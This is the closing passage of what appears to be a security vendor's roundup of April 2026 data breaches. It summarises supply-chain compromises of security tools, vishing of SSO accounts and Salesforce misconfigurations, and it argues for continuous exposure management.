Look across all ten data breaches of April 2026, and one pattern becomes impossible to ignore: attackers are no longer breaking in. They are walking in through tools you trust, vendors you rely on, and identity providers you assume are protected.

The security toolchain is now the primary target. Checkmarx KICS, Bitwarden CLI, Trivy, and LiteLLM were all compromised in a single coordinated campaign. Anodot's analytics connectors handed attackers authenticated access to a dozen cloud environments at once. When the scanner that finds your vulnerabilities becomes the vulnerability, you have an exposure that your security program was not designed to see.

Identity is the new perimeter, and vishing is winning. ADT's entire Salesforce instance was opened by one compromised Okta SSO account via a phone call. No exploit. No malware. ShinyHunters' entire 2026 campaign runs on this pattern. If your security program is not monitoring for SSO sessions bulk-exporting CRM data, you have an exposure that attackers are already using.

SaaS misconfiguration is silent, scalable, and systemic. The Salesforce misconfiguration behind the McGraw-Hill breach affects every org with improperly configured guest user permissions. DIVD confirmed it is industry-wide. Annual audits do not catch what continuous exposure management would have flagged on day one.

The breaches of April 2026 did not happen because organizations lacked security tools. They happened because those tools could not see the exposures that mattered most, and by the time anyone looked, the damage was done.

For context on what the threat landscape looked like the month before, see the worst data breaches of March 2026. For the full 2025 monthly breach history that sets the backdrop for these attacks, the 2025 data breach roundup is worth reviewing.